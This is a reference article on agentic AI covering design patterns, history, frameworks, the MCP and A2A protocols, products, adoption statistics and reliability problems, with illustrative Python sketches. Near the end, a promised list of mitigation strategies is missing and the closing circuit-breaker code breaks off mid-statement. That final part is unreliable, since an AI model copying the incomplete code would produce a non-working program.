Agentic AI
Last reviewed
May 7, 2026
Sources
20 citations
Review status
Source-backed
Revision
v1 · 3,900 words
Agentic AI refers to artificial intelligence systems that can take autonomous, multi-step actions to accomplish goals, rather than simply responding to individual prompts. Unlike traditional chatbots or AI assistants that answer one question at a time and wait for the next instruction, agentic systems receive a high-level objective and then plan, execute, and iterate through a sequence of steps on their own, often using external tools, browsing the web, writing and running code, or coordinating with other AI agents. The term gained wide currency in 2024 when Andrew Ng, the AI Fund founder and former head of Google Brain, presented it at Sequoia Capital's AI Ascent conference, and it was subsequently adopted by Gartner, McKinsey, and most major AI labs as the dominant framing for the next generation of AI deployment.
Gartner named agentic AI the top strategic technology trend for 2025, defining it as systems that "possess the capability to act autonomously to complete tasks" within defined guardrails. McKinsey described agentic AI as "a system based on generative AI foundation models that can act in the real world and execute multistep processes." As of 2026, adoption has spread rapidly: roughly 79% of organizations report some level of agentic AI deployment, though fewer than one in nine runs such systems in full production.
The word "agentic" comes from "agency," the capacity of an entity to act independently in pursuit of a goal. Applied to AI, agentic behavior means a system can perceive its environment, reason about what to do, choose and invoke tools or sub-processes, observe the results, and loop back until the goal is reached or the system determines it cannot proceed.
Agentic AI overlaps with, but is broader than, several related concepts. An AI agent is any system that acts on behalf of a user; the agentic AI framing emphasizes the class of agents built on large language models (LLMs) that reason in natural language and use a wide variety of tools. An agentic workflow describes the specific sequence of steps such a system follows. The term agentic AI, as it emerged in 2024-2026, typically refers to the overall paradigm: LLM-based systems capable of operating autonomously over extended periods with minimal human intervention.
Some researchers distinguish between "AI agents" (a long-standing term in academic AI, referring to any goal-directed system) and the newer class of "LLM-powered autonomous agents" that can reason, plan, and act through natural language. In industry usage, the two phrases are often interchangeable.
The agentic AI movement coalesced around a framework that Andrew Ng presented in March 2024, first at Sequoia Capital's AI Ascent event and then in a widely circulated LinkedIn post and DeepLearning.AI newsletter. Ng described four design patterns that distinguish agentic workflows from simple prompt-response interactions:
Reflection is the pattern by which an LLM examines its own output and iterates. Instead of returning an answer to the user immediately, the system prompts itself to review what it produced, identify errors or gaps, and revise. A coding agent using reflection might generate a function, run it, observe any error messages, and then rewrite the function based on those observations. This loop can repeat many times. Reflection draws on earlier work in AI self-evaluation and is related to techniques like constitutional AI and critique-revision prompting.
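The reflection loop can be sketched in a few lines. This is a minimal illustration, not any particular framework's implementation. `scripted_model` is a hypothetical stand-in for an LLM call, and `run_tests` plays the role of the executor whose error messages are fed back into the next draft.

```python
from typing import Callable, Optional

def run_tests(source: str) -> Optional[str]:
    """Execute a candidate implementation and return an error message, or None if it passes."""
    namespace: dict = {}
    try:
        exec(source, namespace)  # acceptable for a toy example; never exec untrusted code like this
        result = namespace["add"](2, 3)
        if result != 5:
            raise AssertionError(f"add(2, 3) returned {result}, expected 5")
    except Exception as exc:  # every failure becomes feedback for the next draft
        return f"{type(exc).__name__}: {exc}"
    return None

def reflect(generate: Callable[[Optional[str]], str], max_rounds: int = 3) -> tuple[str, int]:
    """Draft, test, and revise until the tests pass or the round budget is spent."""
    feedback: Optional[str] = None
    for round_no in range(1, max_rounds + 1):
        candidate = generate(feedback)  # the model sees the previous error, if any
        feedback = run_tests(candidate)
        if feedback is None:
            return candidate, round_no
    raise RuntimeError(f"no passing draft after {max_rounds} rounds; last error: {feedback}")

def scripted_model(feedback: Optional[str]) -> str:
    """Hypothetical stand-in for an LLM: a buggy first draft, then a fix once it sees an error."""
    if feedback is None:
        return "def add(a, b):\n    return a - b\n"
    return "def add(a, b):\n    return a + b\n"

code, rounds = reflect(scripted_model)
print(rounds)  # 2
```

The round budget matters in practice: without it, a model that never fixes the bug would loop indefinitely.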
Tool use is the ability of an LLM to invoke external functions, APIs, or services. Rather than relying only on knowledge baked into its weights, an agent with tool use can search the web, run code, read files, call a database, send emails, or interact with virtually any software system that exposes an interface. OpenAI formalized this capability as "function calling" in its API in June 2023, and it has become standard across virtually all frontier model providers. Tool use is what lets an agentic system actually affect the world, not just describe it.
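The sketch below shows, under stated assumptions, what a host program does around function calling once the model has emitted a JSON object naming a tool and its arguments. The `tool` decorator, the `dispatch` function, and the `word_count` tool are hypothetical. The schema loosely follows the JSON Schema style used by function-calling APIs but is not any provider's exact wire format.

```python
import json
from typing import Any, Callable

# Registry of tools the host application exposes to the model.
TOOLS: dict[str, dict[str, Any]] = {}

def tool(name: str, description: str, parameters: dict[str, Any]) -> Callable:
    """Register a Python function as a tool, alongside the schema shown to the model."""
    def register(fn: Callable[..., Any]) -> Callable[..., Any]:
        TOOLS[name] = {"fn": fn, "description": description, "parameters": parameters}
        return fn
    return register

@tool("word_count", "Count the words in a piece of text.",
      {"type": "object", "properties": {"text": {"type": "string"}}, "required": ["text"]})
def word_count(text: str) -> int:
    return len(text.split())

def dispatch(model_output: str) -> str:
    """Execute a tool call emitted by the model and return a JSON result for the next turn."""
    call = json.loads(model_output)
    spec = TOOLS.get(call.get("name"))
    if spec is None:
        return json.dumps({"error": f"unknown tool {call.get('name')!r}"})
    args = call.get("arguments", {})
    missing = [p for p in spec["parameters"].get("required", []) if p not in args]
    if missing:
        return json.dumps({"error": f"missing arguments: {missing}"})
    return json.dumps({"result": spec["fn"](**args)})

# A hypothetical model response asking for a tool call.
print(dispatch('{"name": "word_count", "arguments": {"text": "agents act in the world"}}'))
# {"result": 5}
```

Errors are returned to the model as data rather than raised, so the model can notice a bad call and try again on its next turn.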
Planning refers to the agent's ability to decompose a high-level goal into a sequence of steps and then execute them in order, adjusting when unexpected results appear. Planning is often implemented through chain-of-thought prompting or through explicit scratchpad outputs where the agent writes out its intended steps before taking them. More sophisticated planning involves tree-of-thought approaches or model-based reasoning that evaluates multiple possible sequences before committing to one. Planning is the pattern most closely tied to the "autonomous" quality of agentic AI: a system that can only respond to individual instructions is reactive, while one that plans is proactive.
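A plan-and-execute loop with re-planning is one common way to implement this behavior. In the sketch below, `toy_plan` and `toy_execute` are hypothetical stand-ins for an LLM planner and a tool executor. A real planner would use the list of completed steps to decide what remains.

```python
from collections import deque
from typing import Callable

def plan_and_execute(goal: str,
                     plan: Callable[[str, list[str]], list[str]],
                     execute: Callable[[str], bool],
                     max_replans: int = 2) -> list[str]:
    """Execute planned steps in order; when a step fails, ask the planner for a new plan.

    `plan` gets the goal and the steps completed so far and returns the remaining steps.
    """
    done: list[str] = []
    queue = deque(plan(goal, done))
    replans = 0
    while queue:
        step = queue.popleft()
        if execute(step):
            done.append(step)
            continue
        if replans >= max_replans:
            raise RuntimeError(f"step {step!r} failed and the replan budget is spent")
        replans += 1
        queue = deque(plan(goal, list(done)))  # re-plan from what has actually happened
    return done

# Hypothetical planner: proposes the API route first, then falls back to a cached copy.
_plans = iter([
    ["fetch data from API", "write report", "publish"],
    ["fetch data from cache", "write report", "publish"],
])

def toy_plan(goal: str, done: list[str]) -> list[str]:
    return next(_plans)

def toy_execute(step: str) -> bool:
    return step != "fetch data from API"  # simulate an API outage

completed = plan_and_execute("publish weekly report", toy_plan, toy_execute)
print(completed)  # ['fetch data from cache', 'write report', 'publish']
```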
Multi-agent collaboration means distributing work across several specialized agents that coordinate to complete tasks that would be too large or complex for a single agent. One agent might gather research, a second might draft a report, a third might critique and revise it, and a fourth might format and deliver it. Ng noted that multi-agent workflows are harder to control because the system's behavior is difficult to predict in advance, but that they often produce better results on complex tasks. This pattern maps onto multi-agent system architectures and is central to how production systems at companies like Salesforce, ServiceNow, and Atlassian are structured.
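The research, drafting, critique, and formatting hand-off can be sketched as a sequential pipeline over shared state. The `Agent` class and the four lambda "specialists" are hypothetical placeholders for LLM-backed agents. Real multi-agent systems add routing, retries, and parallelism that this sketch omits.

```python
from dataclasses import dataclass
from typing import Any, Callable

State = dict[str, Any]

@dataclass
class Agent:
    role: str
    act: Callable[[State], State]  # reads the shared state, returns the fields it updates

def run_pipeline(agents: list[Agent], state: State) -> State:
    """Hand a shared state to each specialist in turn and log who contributed."""
    state = {**state, "log": []}
    for agent in agents:
        state.update(agent.act(state))
        state["log"].append(agent.role)
    return state

# Hypothetical specialists; in a real system each `act` would wrap an LLM call.
team = [
    Agent("researcher", lambda s: {"notes": [f"{s['topic']} use tools", f"{s['topic']} plan steps"]}),
    Agent("writer", lambda s: {"draft": "; ".join(s["notes"])}),
    Agent("critic", lambda s: {"draft": s["draft"].capitalize() + "."}),
    Agent("formatter", lambda s: {"output": f"## {s['topic']}\n{s['draft']}"}),
]

result = run_pipeline(team, {"topic": "agents"})
print(result["output"])
```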
Ng argued that agentic reasoning, applied to existing models, could yield more improvement per dollar than continued scaling of model size, stating at AI Ascent that $100,000 spent on agentic reasoning could outpace $100 million spent on training larger models for many practical tasks.
The technical building blocks of agentic AI accumulated over several years before the term became mainstream.
In 2022, researchers at Princeton University and Google published the ReAct (Reasoning + Acting) framework, which showed that LLMs could interleave natural language reasoning with discrete actions such as querying Wikipedia. This established the basic loop that most modern agentic systems still follow: think, act, observe, repeat.
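The think, act, observe loop can be sketched with the text format ReAct popularized. The model writes a `Thought:` line and an `Action: Name[argument]` line, and the host appends an `Observation:` line. The scripted model and the `FACTS` table are hypothetical stand-ins for an LLM and the Wikipedia API, and only `Search` and `Finish` actions are modeled here.

```python
import re
from typing import Callable

# Matches lines such as "Action: Search[ReAct]" in the model's output.
ACTION = re.compile(r"Action:\s*(\w+)\[(.*)\]")

def react(question: str, llm: Callable[[str], str],
          tools: dict[str, Callable[[str], str]], max_steps: int = 5) -> str:
    """Alternate model reasoning (Thought/Action) with tool results (Observation)."""
    transcript = f"Question: {question}\n"
    for _ in range(max_steps):
        step = llm(transcript)  # the model writes a Thought followed by an Action
        transcript += step + "\n"
        match = ACTION.search(step)
        if match is None:
            transcript += "Observation: no valid action found\n"
            continue
        name, arg = match.groups()
        if name == "Finish":
            return arg
        tool = tools.get(name)
        observation = tool(arg) if tool else f"unknown action {name}"
        transcript += f"Observation: {observation}\n"
    raise RuntimeError("no answer within the step budget")

# Toy lookup table standing in for Wikipedia (hypothetical data).
FACTS = {"ReAct": "ReAct was first posted in October 2022."}

def scripted_llm(transcript: str) -> str:
    """Hypothetical stand-in for an LLM that follows the ReAct format."""
    if "Observation:" not in transcript:
        return "Thought: I need to look this up.\nAction: Search[ReAct]"
    return "Thought: The observation gives the year.\nAction: Finish[2022]"

answer = react("In what year did ReAct appear?", scripted_llm,
               {"Search": lambda q: FACTS.get(q, "no result")})
print(answer)  # 2022
```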
In the spring of 2023, AutoGPT (released in March 2023 by Toran Bruce Richards) and BabyAGI (shared by Yohei Nakajima in April 2023) went viral on GitHub, with AutoGPT attracting more than 50,000 stars in its first month. These early systems were often brittle, looping indefinitely or producing incoherent plans, but they demonstrated the appetite for autonomous AI and surfaced the key failure modes. In June 2023, OpenAI introduced function calling in its API, giving developers a structured way to expose tools to language models.
LangChain, launched in October 2022, became the dominant library for building LLM-powered applications and agents, providing abstractions for memory, tool use, and chains of calls. By 2024, LangGraph had emerged from the LangChain ecosystem as a dedicated orchestration layer for complex, stateful agent workflows.
In early 2024, Andrew Ng's presentations and the launch of Devin (March 2024) by Cognition Labs shifted the conversation from research curiosity to production readiness. Devin was marketed as the world's first AI software engineer, capable of handling entire coding tasks end to end. By the second half of 2024, major AI labs had all launched or announced dedicated agent offerings, and enterprise pilots were multiplying rapidly.
Several software frameworks handle the orchestration logic that agentic AI requires: managing state across steps, routing between agents, handling failures, and streaming results back to users.
LangGraph is an open-source, MIT-licensed library maintained by LangChain. It models agent workflows as directed graphs in which nodes are processing steps and edges define transitions, including conditional branches and cycles. LangGraph supports durable execution, so an agent can survive failures and resume from a checkpoint; human-in-the-loop pauses, in which a person can inspect and modify the agent's state; and both short-term and long-term memory. Companies such as Klarna, Replit, and Elastic have used LangGraph in production. Between Q1 2024 and Q1 2025, the broader LangChain ecosystem saw a 220% increase in GitHub stars and a 300% increase in package downloads.
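The graph model, with conditional edges, cycles, and checkpoint-based resumption, can be illustrated without the library itself. The sketch below does not use LangGraph's API, which provides its own graph and checkpointer classes. The `Graph` class, node names, and simulated outage are hypothetical, chosen to show an agent resuming at the failed step instead of starting over.

```python
import copy
from typing import Callable, Union

State = dict
Node = Callable[[State], State]
Edge = Union[str, Callable[[State], str]]  # fixed target, or a router for conditional branches

class Graph:
    """Toy state graph with conditional edges, cycles, and per-step checkpoints."""

    def __init__(self) -> None:
        self.nodes: dict[str, Node] = {}
        self.edges: dict[str, Edge] = {}
        self.checkpoints: list[tuple[str, State]] = []  # (next node to run, state snapshot)

    def add_node(self, name: str, fn: Node) -> None:
        self.nodes[name] = fn

    def add_edge(self, src: str, target: Edge) -> None:
        self.edges[src] = target

    def run(self, start: str, state: State, resume: bool = False) -> State:
        node = start
        if resume and self.checkpoints:
            node, state = copy.deepcopy(self.checkpoints[-1])  # continue after the last finished node
        while node != "END":
            state = self.nodes[node](state)
            target = self.edges[node]
            node = target(state) if callable(target) else target
            self.checkpoints.append((node, copy.deepcopy(state)))
        return state

calls = {"draft": 0, "review": 0}

def draft(s: State) -> State:
    calls["draft"] += 1
    return {**s, "quality": s["quality"] + 1}

def review(s: State) -> State:
    calls["review"] += 1
    if calls["review"] == 1:
        raise ConnectionError("simulated outage")  # the first review attempt crashes
    return s

g = Graph()
g.add_node("draft", draft)
g.add_node("review", review)
g.add_edge("draft", "review")
g.add_edge("review", lambda s: "END" if s["quality"] >= 2 else "draft")  # cycle until good enough

try:
    final = g.run("draft", {"quality": 0})
except ConnectionError:
    final = g.run("draft", {"quality": 0}, resume=True)  # resumes at "review", not at "draft"
print(final, calls)  # {'quality': 2} {'draft': 2, 'review': 3}
```

The first draft is not redone after the crash, which is the practical benefit of checkpointing when nodes are expensive LLM calls.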
CrewAI is an open-source Python framework built independently of LangChain. Its organizing metaphor is the crew: each agent receives a role (researcher, writer, critic, manager), a goal, and a backstory, and agents collaborate as a team. CrewAI supports sequential and hierarchical process types; in a hierarchical process, a manager agent delegates tasks to worker agents. A consensual process, in which agents would vote on decisions, has been described in CrewAI's documentation as planned. CrewAI has become the second most widely searched agent framework, popular with marketing teams and small-to-mid-size businesses that want a low-barrier entry into multi-agent automation.
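A framework-free sketch of the crew idea follows. Role, goal, and backstory are folded into each agent's instructions, and in a hierarchical process a manager decides which worker takes each task. This is not CrewAI's API. `CrewMember`, `run_hierarchical`, and `toy_manager` (a stand-in for the manager's LLM) are hypothetical.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class CrewMember:
    role: str
    goal: str
    backstory: str

    def system_prompt(self) -> str:
        """Fold role, goal, and backstory into the instructions the member's LLM would get."""
        return f"You are a {self.role}. {self.backstory} Your goal: {self.goal}"

def run_hierarchical(tasks: list[str], crew: list[CrewMember],
                     choose: Callable[[str, list[str]], str]) -> list[tuple[str, str]]:
    """A manager assigns each task to one worker; `choose` stands in for the manager's LLM."""
    by_role = {member.role: member for member in crew}
    assignments = []
    for task in tasks:
        role = choose(task, list(by_role))
        if role not in by_role:
            raise ValueError(f"manager picked unknown role {role!r}")
        assignments.append((task, role))
    return assignments

crew = [
    CrewMember("researcher", "collect accurate sources", "You have read every paper on agents."),
    CrewMember("writer", "produce a clear summary", "You write for busy executives."),
]

def toy_manager(task: str, roles: list[str]) -> str:
    return "researcher" if task.lower().startswith("find") else "writer"

plan = run_hierarchical(["Find three sources on MCP", "Summarize the sources"], crew, toy_manager)
print(plan)
print(crew[0].system_prompt())
```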
The OpenAI Agents SDK was released in March 2025, replacing the earlier experimental Swarm library. Its core abstraction is the handoff: agents explicitly transfer control to other agents along with conversational context. Each agent is defined by instructions, a model reference, a set of tools, and a list of agents it can hand off to. OpenAI updated the SDK in April 2026 with enterprise safety features and guardrails. The SDK is designed for production use, with tracing, error handling, and support for parallel agent execution.
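The handoff abstraction can be illustrated without the SDK. This sketch does not use the OpenAI Agents SDK's own classes. Each hypothetical `Agent` has instructions and a list of agents it may hand off to, and a `decide` function stands in for the model choosing between answering and transferring control along with the conversation history.

```python
from dataclasses import dataclass, field
from typing import Callable

@dataclass
class Agent:
    name: str
    instructions: str
    # Stand-in for the model: returns ("handoff", agent_name) or ("answer", text).
    decide: Callable[[list[str]], tuple[str, str]]
    handoffs: list["Agent"] = field(default_factory=list)

def run(agent: Agent, user_input: str, max_turns: int = 5) -> tuple[str, str]:
    """Let the active agent answer or transfer control, keeping the shared history."""
    history = [f"user: {user_input}"]
    for _ in range(max_turns):
        kind, value = agent.decide(history)
        if kind == "answer":
            return agent.name, value
        targets = {a.name: a for a in agent.handoffs}
        if value not in targets:
            raise ValueError(f"{agent.name} cannot hand off to {value!r}")
        history.append(f"{agent.name}: handing off to {value}")
        agent = targets[value]  # the new agent sees the full history so far
    raise RuntimeError("turn limit reached")

billing = Agent("billing", "Resolve billing questions.",
                lambda h: ("answer", f"Refund issued ({len(h)} messages of context)"))
triage = Agent("triage", "Route the user to the right specialist.",
               lambda h: ("handoff", "billing") if "refund" in h[0] else ("answer", "How can I help?"),
               handoffs=[billing])

print(run(triage, "I need a refund"))  # ('billing', 'Refund issued (2 messages of context)')
```

Restricting each agent to an explicit `handoffs` list keeps the routing graph auditable: an agent cannot transfer control to a peer it was not given.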
The Claude Agent SDK is Anthropic's framework for building agents that use Claude models. Anthropic takes a tool-use-first design philosophy: agents are Claude models augmented with tools, and sub-agents are invoked as tools of a parent agent, creating a supervisor tree. The SDK integrates tightly with the Model Context Protocol so that any MCP-compatible tool or data source can be connected to an agent without custom integration code.
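The sub-agents-as-tools design can be sketched by giving an agent the same signature as a tool. A parent can then list a child agent in its tool registry, and nested calls form a supervisor tree. This does not use the Claude Agent SDK. `make_agent`, the routing lambdas, and the agent names are hypothetical.

```python
from typing import Callable

Tool = Callable[[str], str]

def make_agent(name: str, tools: dict[str, Tool],
               route: Callable[[str], tuple[str, str]]) -> Tool:
    """Build an agent that is itself a Tool: it takes a task string and returns a result.

    `route` stands in for the model choosing which tool to call (or "respond" to answer
    directly) and what input to give it.
    """
    def agent(task: str) -> str:
        tool_name, tool_input = route(task)
        if tool_name == "respond":
            return f"[{name}] {tool_input}"
        return f"[{name}] {tools[tool_name](tool_input)}"
    return agent

# Leaf sub-agent with no tools of its own (hypothetical behavior).
reviewer = make_agent("reviewer", {}, lambda task: ("respond", f"looks fine: {task}"))

# Because a sub-agent has the same signature as a tool, the parent simply lists it as one.
lead = make_agent(
    "lead",
    {"review": reviewer},
    lambda task: ("review", task) if "review" in task else ("respond", "done"),
)

print(lead("review utils.py"))  # [lead] [reviewer] looks fine: review utils.py
```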
Google introduced the Agent Development Kit (ADK) in April 2025 as part of Google Cloud. ADK uses a hierarchical agent tree, where a root agent manages a set of child agents, mirroring the supervisor pattern. ADK has native support for Gemini's multimodal capabilities, so agents can process images, audio, and video in addition to text. ADK is designed for deployment on Google Cloud infrastructure and integrates with Vertex AI for model hosting and monitoring.
As agentic AI systems multiplied, two open protocols emerged to solve coordination problems that no single framework could address alone.
The Model Context Protocol (MCP) is an open standard, introduced by Anthropic in November 2024, for connecting AI systems to external tools and data sources. Before MCP, each integration required custom code, creating what developers described as an "N times M problem": connecting ten AI applications to one hundred tools could require up to one thousand custom connectors. MCP addresses this by defining a single client-server protocol, built on JSON-RPC 2.0 messages, that each tool provider implements once as a server and each AI application implements once as a client, reducing the work to roughly N plus M implementations (110 in the example above).
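What MCP standardizes is the message exchange. The sketch below builds JSON-RPC 2.0 requests for the `tools/list` and `tools/call` methods and answers them with a toy in-process server. It follows the request and result shapes in the MCP specification as we understand them. It omits the `initialize` handshake, capability negotiation, and the transport (stdio or HTTP). The `echo` tool and all helper names are hypothetical.

```python
import json
from itertools import count
from typing import Any, Optional

_next_id = count(1)

def make_request(method: str, params: Optional[dict] = None) -> str:
    """Serialize a JSON-RPC 2.0 request of the kind an MCP client sends."""
    message: dict[str, Any] = {"jsonrpc": "2.0", "id": next(_next_id), "method": method}
    if params is not None:
        message["params"] = params
    return json.dumps(message)

# One hypothetical tool exposed by this toy server.
TOOLS: dict[str, dict[str, Any]] = {
    "echo": {
        "description": "Return the input text unchanged.",
        "inputSchema": {"type": "object",
                        "properties": {"text": {"type": "string"}},
                        "required": ["text"]},
        "run": lambda args: args["text"],
    },
}

def reply(msg_id: Any, *, result: Any = None, error: Optional[dict] = None) -> str:
    """Build a JSON-RPC 2.0 response carrying either a result or an error."""
    body: dict[str, Any] = {"jsonrpc": "2.0", "id": msg_id}
    if error is not None:
        body["error"] = error
    else:
        body["result"] = result
    return json.dumps(body)

def handle(raw: str) -> str:
    """Toy server side: answer tools/list and tools/call; any other method is an error."""
    msg = json.loads(raw)
    if msg["method"] == "tools/list":
        tools = [{"name": name, "description": t["description"], "inputSchema": t["inputSchema"]}
                 for name, t in TOOLS.items()]
        return reply(msg["id"], result={"tools": tools})
    if msg["method"] == "tools/call":
        params = msg.get("params", {})
        tool = TOOLS.get(params.get("name"))
        if tool is None:
            return reply(msg["id"], error={"code": -32602, "message": "Unknown tool"})
        text = tool["run"](params.get("arguments", {}))
        return reply(msg["id"], result={"content": [{"type": "text", "text": text}]})
    return reply(msg["id"], error={"code": -32601, "message": "Method not found"})

listing = json.loads(handle(make_request("tools/list")))
answer = json.loads(handle(make_request("tools/call", {"name": "echo", "arguments": {"text": "hi"}})))
print([t["name"] for t in listing["result"]["tools"]])  # ['echo']
print(answer["result"]["content"][0]["text"])           # hi
```

Because every server speaks the same two methods, a client that can call `tools/list` and `tools/call` works with any of them, which is the source of the N-plus-M saving.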
In March 2025, OpenAI announced that it would adopt MCP across its products, starting with its Agents SDK, with support for the ChatGPT desktop application to follow. In December 2025, Anthropic donated MCP governance to the Agentic AI Foundation (AAIF), a directed fund under the Linux Foundation co-founded by Anthropic, Block, and OpenAI. By early 2026, thousands of MCP servers existed, covering databases, code execution environments, web browsers, calendar systems, and many other integrations.
The Agent2Agent Protocol (A2A) was announced by Google in April 2025 with support from more than 50 technology and consulting partners, including Salesforce, SAP, ServiceNow, Deloitte, McKinsey, and Accenture. A2A solves a different problem than MCP: where MCP connects an agent to tools, A2A enables agents built by different vendors and on different frameworks to communicate with each other.
A2A introduces four capabilities: Agent Cards (JSON documents that describe what an agent can do), task management with defined lifecycle states, context sharing for long-running collaborative tasks, and user experience negotiation so that agents can agree on how to present results. In June 2025, Google donated A2A governance to the Linux Foundation under the Apache 2.0 license. By April 2026, more than 150 organizations had formally adopted the protocol.
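The task lifecycle can be pictured as a small state machine. In this sketch the state names follow those used in the A2A specification as we understand it; later revisions may define additional states. The transition table and the `Task` class are our own simplification for illustration, not the protocol's normative rules or an SDK API.

```python
from enum import Enum

class TaskState(str, Enum):
    SUBMITTED = "submitted"
    WORKING = "working"
    INPUT_REQUIRED = "input-required"
    COMPLETED = "completed"
    CANCELED = "canceled"
    FAILED = "failed"

# Simplified transition table for illustration; not the protocol's normative rules.
ALLOWED: dict[TaskState, set[TaskState]] = {
    TaskState.SUBMITTED: {TaskState.WORKING, TaskState.CANCELED, TaskState.FAILED},
    TaskState.WORKING: {TaskState.INPUT_REQUIRED, TaskState.COMPLETED,
                        TaskState.CANCELED, TaskState.FAILED},
    TaskState.INPUT_REQUIRED: {TaskState.WORKING, TaskState.CANCELED},
}
TERMINAL = {TaskState.COMPLETED, TaskState.CANCELED, TaskState.FAILED}

class Task:
    """A long-running unit of work shared between a client agent and a remote agent."""

    def __init__(self, task_id: str) -> None:
        self.id = task_id
        self.state = TaskState.SUBMITTED
        self.history = [self.state]

    def transition(self, new: TaskState) -> None:
        if new not in ALLOWED.get(self.state, set()):  # terminal states allow nothing
            raise ValueError(f"illegal transition {self.state.value} -> {new.value}")
        self.state = new
        self.history.append(new)

task = Task("task-1")
# The remote agent starts, pauses to ask the client for input, resumes, and finishes.
for step in (TaskState.WORKING, TaskState.INPUT_REQUIRED, TaskState.WORKING, TaskState.COMPLETED):
    task.transition(step)
print([s.value for s in task.history])
# ['submitted', 'working', 'input-required', 'working', 'completed']
```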
A2A and MCP are complementary: MCP governs the relationship between an agent and its tools, while A2A governs the relationship between agents and other agents.
Devin was announced by Cognition Labs on March 12, 2024, and was marketed as the first AI software engineer capable of handling an entire software task autonomously. Devin plans a project, writes code, runs tests, debugs errors, searches documentation online, and can deploy the finished application. On the SWE-bench benchmark, which asks agents to resolve real GitHub issues in open-source projects, Devin resolved 13.86% of issues end to end at launch, measured on a randomly selected 25% subset of the benchmark, compared with a previous state of the art of 1.96%. Cognition was founded by ten engineers, including CEO Scott Wu, and was funded by Founders Fund. Devin subsequently attracted Goldman Sachs as an enterprise customer, where it was deployed as part of a "hybrid workforce" initiative. Reception was mixed: early praise was followed by critical analysis from reviewers who found that the public demos did not fully represent the system's reliability on unscripted tasks.
Manus AI launched in invitation-only beta on March 6, 2025, developed by Butterfly Effect, a startup backed by Tencent Holdings. Manus positioned itself as a general AI agent, meaning it attempted to handle a broader range of tasks than domain-specific agents. The launch demo, which showed the agent autonomously screening job applications and conducting stock analysis, drew more than one million views within twenty hours. Manus distinguishes itself technically through a "Manus's Computer" interface that lets users observe and intervene in the agent's actions in real time. Manus later shelved a planned Chinese-language version that had been announced as a partnership with Alibaba's Qwen team, closed its Chinese-language social media accounts, and blocked access from mainland China.
OpenAI Operator was announced on January 23, 2025, and released the same day as a limited-access research preview for ChatGPT Pro subscribers in the United States. Operator is powered by a model called Computer-Using Agent (CUA), which combines GPT-4o's vision capabilities with reinforcement learning training on graphical user interfaces. Operator can navigate websites, fill out forms, book travel, make restaurant reservations, and complete shopping tasks by controlling a browser autonomously. At release, it set new benchmark results on WebArena and WebVoyager, two key browser-use evaluations. On July 17, 2025, Operator was integrated directly into ChatGPT as the "ChatGPT agent" feature.
Computer use is a capability introduced by Anthropic in October 2024 for Claude 3.5 Sonnet. It allows Claude to take screenshots, move a cursor, click buttons, type text, and otherwise interact with a desktop or web environment in the same way a human user would. Unlike Operator, which controls a browser, Claude's computer use capability works across the full desktop. Companies including Asana, Canva, Cognition, DoorDash, Replit, and The Browser Company integrated computer use into their platforms during its beta period. Anthropic has continued expanding computer use support across Claude model generations.
By 2025 and 2026, agentic AI had moved from research labs to enterprise procurement conversations.
Gartner predicted in its 2025 strategic technology trends report that at least 15% of day-to-day work decisions would be made autonomously through agentic AI by 2028, up from near zero in 2024. Gartner also projected that 33% of enterprise software applications would include agentic AI by 2028, up from less than 1% in 2024. Striking a more cautionary note, Gartner predicted in June 2025 that more than 40% of agentic AI projects would be canceled by the end of 2027, citing escalating costs, unclear business value, and inadequate risk controls.
G2's August 2025 enterprise survey found that 57% of companies had AI agents in production, 22% were in pilot, and 21% were pre-pilot. The AI agents market is projected to exceed $10.9 billion in 2026, up from approximately $7.7 billion in 2025, at a compound annual growth rate above 45%. Enterprise deployments that do reach production have reported average returns on investment of 171%, according to Arcade Research's 2025 survey, with US enterprises reporting closer to 192%.
Software development and customer service are the two use cases most commonly cited by enterprises in production. Gartner predicted that by 2029, agentic AI would autonomously resolve 80% of common customer service issues, cutting operational costs by 30%.
Agentic AI has been applied across a wide range of domains:
| Domain | Representative application |
|---|---|
| Software engineering | Full software task completion (Devin, GitHub Copilot Workspace, Cursor) |
| Research | Multi-source synthesis and report generation (OpenAI Deep Research, Perplexity) |
| Customer service | Autonomous ticket resolution and escalation routing |
| Web automation | Booking travel, filling forms, scraping data (Operator, Browser Use) |
| Data analysis | Pulling from databases, running calculations, generating visualizations |
| Document workflows | Contract review, summarization, redlining |
| IT operations | Incident triage, automated remediation, infrastructure provisioning |
| Sales | Lead research, personalized outreach drafting, CRM updates |
| Healthcare | Clinical note generation, prior authorization, appointment scheduling |
| Finance | Reconciliation, fraud pattern detection, regulatory report drafting |
Despite rapid adoption, agentic AI systems face reliability problems that meaningfully distinguish them from traditional software.
A factual error in a chatbot answer is merely misleading. A hallucinated action taken by an autonomous agent, such as calling a non-existent API endpoint, deleting the wrong file, or submitting incorrect information to a third-party service, can cause irreversible damage. Researchers have termed this the "hallucination in action" problem.
In multi-step workflows, errors compound. A single mistake in an early reasoning step can propagate through subsequent steps, producing a cascade of failures by the end of the task. In multi-agent systems, the problem is more severe: a bad decision by one agent can propagate across interconnected workflows affecting other agents.
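A rough way to see why errors compound is to assume, purely for illustration, that each of n steps succeeds independently with the same probability p. This independence assumption is ours, not the source's. The chance that an n-step run contains no error is then the product of the per-step success rates:

```latex
P(\text{all } n \text{ steps succeed}) = \prod_{i=1}^{n} p = p^{n},
\qquad 0.95^{20} \approx 0.36, \qquad 0.99^{20} \approx 0.82
```

Even a step that is 95% reliable yields only about a 36% chance of a clean 20-step run. Real errors are rarely independent, and agents that detect and repair mistakes can beat this figure, but the product shows why long chains amplify small per-step error rates.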
Agents also sometimes enter infinite loops, retrying a failed action repeatedly without modifying their approach. This is distinct from hallucination but equally disruptive in production systems.
Common mitigation strategies include:
The NIST AI Risk Management Framework was updated in 2025 to include specific guidance for agentic AI, requiring organizations to map all agent tool access permissions and implement circuit breakers.
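The following is one possible form of a circuit breaker, aimed at the retry loops described earlier. The breaker trips when the same call has failed a set number of times or when a per-run call budget is exhausted, and the agent must then stop and escalate. The class, thresholds, and simulated `fetch` failure are hypothetical; this is not a definition taken from the NIST framework.

```python
from collections import Counter
from typing import Any, Callable

class CircuitOpen(Exception):
    """Raised when the agent should stop and escalate instead of retrying."""

class CircuitBreaker:
    def __init__(self, max_repeats: int = 3, max_calls: int = 50) -> None:
        self.max_repeats = max_repeats  # identical failing calls tolerated before tripping
        self.max_calls = max_calls      # hard cap on tool calls in one run
        self.failures: Counter = Counter()
        self.calls = 0

    def call(self, tool: Callable[..., Any], *args: Any) -> Any:
        key = (tool.__name__, args)  # args must be hashable to serve as a key
        if self.failures[key] >= self.max_repeats:
            raise CircuitOpen(f"{tool.__name__} failed {self.failures[key]} times with the same "
                              f"arguments; escalating to a human")
        if self.calls >= self.max_calls:
            raise CircuitOpen(f"tool-call budget of {self.max_calls} exhausted")
        self.calls += 1
        try:
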